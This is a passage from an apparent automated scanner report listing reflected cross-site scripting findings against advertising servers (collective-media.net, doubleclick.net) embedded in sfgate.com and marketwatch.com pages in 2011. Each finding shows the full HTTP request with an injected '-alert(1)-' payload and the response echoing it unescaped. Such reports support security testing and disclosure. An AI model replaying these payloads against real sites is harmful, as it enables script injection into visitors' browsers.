Referer: http://www.sfgate.com/cgi-bin/article.cgi?f=/g/a/2011/05/08/bloomberg1376-LKWYZF6S972G01-5U2F4H9B4Q540L3322OU7K5SKS.DTL
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; apnx=1; qcms=1; nadp=1; blue=1; qcdp=1; exdp=1; ibvr=1; brlg=1; mmpg=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 455
Date: Mon, 09 May 2011 16:17:11 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Wed, 08-Jun-2011 16:17:11 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://a.collective-media.net/cmadj/q1.sanfrancisco/bus;sz=300x250;net=q1;ord=1304957812.967?&e88ce'-alert(1)-'d0280cefb14=1;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

2.16. http://a.collective-media.net/adj/q1.sanfrancisco/bus [sz parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.collective-media.net
Path:	/adj/q1.sanfrancisco/bus

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload acec5'-alert(1)-'72e714b19c1 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/q1.sanfrancisco/bus;sz=300x250;click0=http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0NGZjdGRkZyhnaWQkYmZjOTdhOGUtN2E1Ny0xMWUwLThmNWUtOWZmMjI5MzM4NzE4LHN0JDEzMDQ5NTc4MTE5NTAzMjIsc2kkMjEzNTUxLHYkMS4wLGFpZCRCSnVBTzB3Tmlacy0sY3QkMjUseWJ4JDVkOGpRR3FGN1pwaVBZZk1XSzVIaVEsciQwKSk/1/*;ord=1304957812.967?acec5'-alert(1)-'72e714b19c1 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.sfgate.com/cgi-bin/article.cgi?f=/g/a/2011/05/08/bloomberg1376-LKWYZF6S972G01-5U2F4H9B4Q540L3322OU7K5SKS.DTL
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; apnx=1; qcms=1; nadp=1; blue=1; qcdp=1; exdp=1; ibvr=1; brlg=1; mmpg=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 452
Vary: Accept-Encoding
Date: Mon, 09 May 2011 16:17:00 GMT
Connection: close
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Wed, 08-Jun-2011 16:17:00 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://a.collective-media.net/cmadj/q1.sanfrancisco/bus;sz=300x250;net=q1;ord=1304957812.967?acec5'-alert(1)-'72e714b19c1;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

2.17. http://a.collective-media.net/cmadj/q1.q.sanfrancisco/be_bus [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.collective-media.net
Path:	/cmadj/q1.q.sanfrancisco/be_bus

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f6eb3'-alert(1)-'e56056ae3ee was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /cmadjf6eb3'-alert(1)-'e56056ae3ee/q1.q.sanfrancisco/be_bus;sz=300x250;net=q1;ord=1412414579;ord1=456064;cmpgurl=http%253A//www.sfgate.com/cgi-bin/article.cgi%253Ff%253D/g/a/2011/05/08/bloomberg1376-LKWYZF6S972G01-5U2F4H9B4Q540L3322OU7K5SKS.DTL? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.sfgate.com/cgi-bin/article.cgi?f=/g/a/2011/05/08/bloomberg1376-LKWYZF6S972G01-5U2F4H9B4Q540L3322OU7K5SKS.DTL
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; apnx=1; qcms=1; nadp=1; blue=1; qcdp=1; exdp=1; ibvr=1; brlg=1; mmpg=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Mon, 09 May 2011 16:17:20 GMT
Connection: close
Content-Length: 7613

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("q1-43514062_1304957840","http://ad.doubleclick.net/adjf6eb3'-alert(1)-'e56056ae3ee/q1.q.sanfrancisco/be_bus;net=q1;u=,q1-43514062_1304957840,11f8f328940989e,sports,am.h-am.b-q1.polit_h-q1.none_h-q1.ent_h-q1.food_h-q1.sports_h-dx.16-dx.23-dx.17-mm.ag1-mm.ak1-mm.am1-mm.aq1-cm.ent_h-cm
...[SNIP]...

2.18. http://a.collective-media.net/cmadj/q1.q.sanfrancisco/be_bus [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.collective-media.net
Path:	/cmadj/q1.q.sanfrancisco/be_bus

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ab157'-alert(1)-'32002d84803 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /cmadj/q1.q.sanfranciscoab157'-alert(1)-'32002d84803/be_bus;sz=300x250;net=q1;ord=1412414579;ord1=456064;cmpgurl=http%253A//www.sfgate.com/cgi-bin/article.cgi%253Ff%253D/g/a/2011/05/08/bloomberg1376-LKWYZF6S972G01-5U2F4H9B4Q540L3322OU7K5SKS.DTL? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.sfgate.com/cgi-bin/article.cgi?f=/g/a/2011/05/08/bloomberg1376-LKWYZF6S972G01-5U2F4H9B4Q540L3322OU7K5SKS.DTL
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; apnx=1; qcms=1; nadp=1; blue=1; qcdp=1; exdp=1; ibvr=1; brlg=1; mmpg=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Mon, 09 May 2011 16:17:21 GMT
Connection: close
Content-Length: 7605

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("q1-21931786_1304957841","http://ad.doubleclick.net/adj/q1.q.sanfranciscoab157'-alert(1)-'32002d84803/be_bus;net=q1;u=,q1-21931786_1304957841,11f8f328940989e,sports,am.h-am.b-q1.polit_h-q1.none_h-q1.ent_h-q1.food_h-q1.sports_h-dx.16-dx.23-dx.17-mm.ag1-mm.ak1-mm.am1-mm.aq1-cm.ent_h-cm.music_h-cm.weath_
...[SNIP]...

2.19. http://a.collective-media.net/cmadj/q1.q.sanfrancisco/be_bus [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.collective-media.net
Path:	/cmadj/q1.q.sanfrancisco/be_bus

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d5dd0'-alert(1)-'b99020a0b7a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /cmadj/q1.q.sanfrancisco/be_busd5dd0'-alert(1)-'b99020a0b7a;sz=300x250;net=q1;ord=1412414579;ord1=456064;cmpgurl=http%253A//www.sfgate.com/cgi-bin/article.cgi%253Ff%253D/g/a/2011/05/08/bloomberg1376-LKWYZF6S972G01-5U2F4H9B4Q540L3322OU7K5SKS.DTL? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.sfgate.com/cgi-bin/article.cgi?f=/g/a/2011/05/08/bloomberg1376-LKWYZF6S972G01-5U2F4H9B4Q540L3322OU7K5SKS.DTL
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; apnx=1; qcms=1; nadp=1; blue=1; qcdp=1; exdp=1; ibvr=1; brlg=1; mmpg=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Mon, 09 May 2011 16:17:21 GMT
Connection: close
Content-Length: 7605

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("q1-18722583_1304957841","http://ad.doubleclick.net/adj/q1.q.sanfrancisco/be_busd5dd0'-alert(1)-'b99020a0b7a;net=q1;u=,q1-18722583_1304957841,11f8f328940989e,sports,am.h-am.b-q1.polit_h-q1.none_h-q1.ent_h-q1.food_h-q1.sports_h-dx.16-dx.23-dx.17-mm.ag1-mm.ak1-mm.am1-mm.aq1-cm.ent_h-cm.music_h-cm.weath_h-cm.sp
...[SNIP]...

2.20. http://a.collective-media.net/cmadj/q1.q.sanfrancisco/be_bus [sz parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.collective-media.net
Path:	/cmadj/q1.q.sanfrancisco/be_bus

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d8af3'-alert(1)-'d1f91ff653a was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /cmadj/q1.q.sanfrancisco/be_bus;sz=d8af3'-alert(1)-'d1f91ff653a HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.sfgate.com/cgi-bin/article.cgi?f=/g/a/2011/05/08/bloomberg1376-LKWYZF6S972G01-5U2F4H9B4Q540L3322OU7K5SKS.DTL
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; apnx=1; qcms=1; nadp=1; blue=1; qcdp=1; exdp=1; ibvr=1; brlg=1; mmpg=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Mon, 09 May 2011 16:17:20 GMT
Connection: close
Content-Length: 7554

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
s;net=q1;u=,q1-91115822_1304957840,11f8f328940989e,none,q1.polit_h-q1.none_h-q1.ent_h-q1.food_h-q1.sports_h-dx.16-dx.23-dx.17-mm.ag1-mm.ak1-mm.am1-mm.aq1-cm.ent_h-cm.music_h-cm.weath_h-cm.sports_h;;sz=d8af3'-alert(1)-'d1f91ff653a;contx=none;dc=w;btg=q1.polit_h;btg=q1.none_h;btg=q1.ent_h;btg=q1.food_h;btg=q1.sports_h;btg=dx.16;btg=dx.23;btg=dx.17;btg=mm.ag1;btg=mm.ak1;btg=mm.am1;btg=mm.aq1;btg=cm.ent_h;btg=cm.music_h;btg=cm.wea
...[SNIP]...

2.21. http://a.collective-media.net/cmadj/q1.sanfrancisco/bus [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.collective-media.net
Path:	/cmadj/q1.sanfrancisco/bus

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4ffa8'-alert(1)-'92159c874de was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /cmadj4ffa8'-alert(1)-'92159c874de/q1.sanfrancisco/bus;sz=300x250;net=q1;ord=1304957812.967;ord1=763084;cmpgurl=http%253A//www.sfgate.com/cgi-bin/article.cgi%253Ff%253D/g/a/2011/05/08/bloomberg1376-LKWYZF6S972G01-5U2F4H9B4Q540L3322OU7K5SKS.DTL? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.sfgate.com/cgi-bin/article.cgi?f=/g/a/2011/05/08/bloomberg1376-LKWYZF6S972G01-5U2F4H9B4Q540L3322OU7K5SKS.DTL
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; apnx=1; qcms=1; nadp=1; blue=1; qcdp=1; exdp=1; ibvr=1; brlg=1; mmpg=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Mon, 09 May 2011 16:17:11 GMT
Connection: close
Content-Length: 7582

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("q1-5213259_1304957831","http://ad.doubleclick.net/adj4ffa8'-alert(1)-'92159c874de/q1.sanfrancisco/bus;net=q1;u=,q1-5213259_1304957831,11f8f328940989e,sports,am.h-am.b-q1.polit_h-q1.none_h-q1.ent_h-q1.food_h-q1.sports_h-dx.16-dx.23-dx.17-mm.ag1-mm.ak1-mm.am1-mm.aq1-cm.ent_h-cm.music
...[SNIP]...

2.22. http://a.collective-media.net/cmadj/q1.sanfrancisco/bus [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.collective-media.net
Path:	/cmadj/q1.sanfrancisco/bus

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload adc31'-alert(1)-'661b999977a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /cmadj/q1.sanfranciscoadc31'-alert(1)-'661b999977a/bus;sz=300x250;net=q1;ord=1304957812.967;ord1=763084;cmpgurl=http%253A//www.sfgate.com/cgi-bin/article.cgi%253Ff%253D/g/a/2011/05/08/bloomberg1376-LKWYZF6S972G01-5U2F4H9B4Q540L3322OU7K5SKS.DTL? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.sfgate.com/cgi-bin/article.cgi?f=/g/a/2011/05/08/bloomberg1376-LKWYZF6S972G01-5U2F4H9B4Q540L3322OU7K5SKS.DTL
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; apnx=1; qcms=1; nadp=1; blue=1; qcdp=1; exdp=1; ibvr=1; brlg=1; mmpg=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Mon, 09 May 2011 16:17:12 GMT
Connection: close
Content-Length: 7576

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("q1-65451567_1304957832","http://ad.doubleclick.net/adj/q1.sanfranciscoadc31'-alert(1)-'661b999977a/bus;net=q1;u=,q1-65451567_1304957832,11f8f328940989e,sports,am.h-am.b-q1.polit_h-q1.none_h-q1.ent_h-q1.food_h-q1.sports_h-dx.16-dx.23-dx.17-mm.ag1-mm.ak1-mm.am1-mm.aq1-cm.ent_h-cm.music_h-cm.weath_h;;
...[SNIP]...

2.23. http://a.collective-media.net/cmadj/q1.sanfrancisco/bus [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.collective-media.net
Path:	/cmadj/q1.sanfrancisco/bus

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 438b0'-alert(1)-'bc015c8f41b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /cmadj/q1.sanfrancisco/bus438b0'-alert(1)-'bc015c8f41b;sz=300x250;net=q1;ord=1304957812.967;ord1=763084;cmpgurl=http%253A//www.sfgate.com/cgi-bin/article.cgi%253Ff%253D/g/a/2011/05/08/bloomberg1376-LKWYZF6S972G01-5U2F4H9B4Q540L3322OU7K5SKS.DTL? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.sfgate.com/cgi-bin/article.cgi?f=/g/a/2011/05/08/bloomberg1376-LKWYZF6S972G01-5U2F4H9B4Q540L3322OU7K5SKS.DTL
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; apnx=1; qcms=1; nadp=1; blue=1; qcdp=1; exdp=1; ibvr=1; brlg=1; mmpg=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Mon, 09 May 2011 16:17:12 GMT
Connection: close
Content-Length: 7576

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("q1-40747257_1304957832","http://ad.doubleclick.net/adj/q1.sanfrancisco/bus438b0'-alert(1)-'bc015c8f41b;net=q1;u=,q1-40747257_1304957832,11f8f328940989e,sports,am.h-am.b-q1.polit_h-q1.none_h-q1.ent_h-q1.food_h-q1.sports_h-dx.16-dx.23-dx.17-mm.ag1-mm.ak1-mm.am1-mm.aq1-cm.ent_h-cm.music_h-cm.weath_h;;sz=3
...[SNIP]...

2.24. http://a.collective-media.net/cmadj/q1.sanfrancisco/bus [sz parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.collective-media.net
Path:	/cmadj/q1.sanfrancisco/bus

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a3b2e'-alert(1)-'2ed63c2f759 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /cmadj/q1.sanfrancisco/bus;sz=a3b2e'-alert(1)-'2ed63c2f759 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.sfgate.com/cgi-bin/article.cgi?f=/g/a/2011/05/08/bloomberg1376-LKWYZF6S972G01-5U2F4H9B4Q540L3322OU7K5SKS.DTL
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; apnx=1; qcms=1; nadp=1; blue=1; qcdp=1; exdp=1; ibvr=1; brlg=1; mmpg=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Mon, 09 May 2011 16:17:01 GMT
Connection: close
Content-Length: 7521

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
francisco/bus;net=q1;u=,q1-15778068_1304957821,11f8f328940989e,none,q1.polit_h-q1.none_h-q1.ent_h-q1.food_h-q1.sports_h-dx.16-dx.23-dx.17-mm.ag1-mm.ak1-mm.am1-mm.aq1-cm.ent_h-cm.music_h-cm.weath_h;;sz=a3b2e'-alert(1)-'2ed63c2f759;contx=none;dc=w;btg=q1.polit_h;btg=q1.none_h;btg=q1.ent_h;btg=q1.food_h;btg=q1.sports_h;btg=dx.16;btg=dx.23;btg=dx.17;btg=mm.ag1;btg=mm.ak1;btg=mm.am1;btg=mm.aq1;btg=cm.ent_h;btg=cm.music_h;btg=cm.wea
...[SNIP]...

2.25. http://ad.doubleclick.net/adj/marketwatch.com/brokerdock [sym parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://ad.doubleclick.net
Path:	/adj/marketwatch.com/brokerdock

Issue detail

The value of the sym request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload db49a'%3bfa9626dfe6f was submitted in the sym parameter. This input was echoed as db49a';fa9626dfe6f in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET /adj/marketwatch.com/brokerdock;sym=db49a'%3bfa9626dfe6f HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.marketwatch.com/investing/future/clm11?link=MW_widget_latestnews_247wallst.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 431
Cache-Control: no-cache
Pragma: no-cache
Date: Mon, 09 May 2011 16:22:22 GMT
Expires: Mon, 09 May 2011 16:22:22 GMT

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b02/0/0/%2a/f;225017382;0-0;0;46413550;255-0/0;36796821/36814699/1;;~okv=;sym=db49a';fa9626dfe6f;~aopt=2/1/ff/1;~sscs=%3fhttp://store.marketwatch.com/webapp/wcs/stores/servlet/PremiumNewsletters_WhatIsWorkingNow?dist=IAEHM1AFW">
...[SNIP]...

2.26. http://ad.doubleclick.net/adj/marketwatch.com/investing_stocks_quotesoverview [sym parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/marketwatch.com/investing_stocks_quotesoverview

Issue detail

The value of the sym request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 82eb8'-alert(1)-'3103ce12c94 was submitted in the sym parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/marketwatch.com/investing_stocks_quotesoverview;sym=82eb8'-alert(1)-'3103ce12c94 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.marketwatch.com/investing/future/clm11?link=MW_widget_latestnews_247wallst.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
